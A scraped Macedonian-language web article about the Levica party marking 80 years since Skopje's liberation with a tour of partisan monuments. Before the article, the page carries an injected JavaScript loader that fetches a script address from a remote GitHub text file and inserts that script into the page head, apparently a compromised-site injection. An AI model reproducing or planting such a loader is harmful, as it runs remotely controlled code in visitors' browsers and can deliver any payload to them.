;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); (Видео) По патеката на слободата - Левица одбележа 80 години слободно Скопје - Антропол
Настани

(Видео) По патеката на слободата – Левица одбележа 80 години слободно Скопје

По патеката на слободата – беше насловена денешната тура по повод 80 години од ослободувањето на Скопје. Активистите од Левица, партискиот подмладок Црвена Младина и Левичарскиот институт Рацин, посетија повеќе од дваесетина споменици, подигнати во чест на народните херои од НОБ.

Во знак на незаборав на злоделата направени од бугарскиот фашистички окупатор, пред секој од спомениците, активистите потсетија за народно-ослободителната борба, херојството и жртвата, дадена од партизаните, за слободно Скопје и Македонија.

Како единствен политички субјект којшто може да се окарактеризира за наследник на АСНОМ-ските вредности, Левица на овој начин искажа почит за оние кои ги дадоа животите за Македонија. Во иднина, принципиелно и непоколебливо, преку парламентарна или вонинституционална борба, продолжуваме да се бориме за вистинските вредности.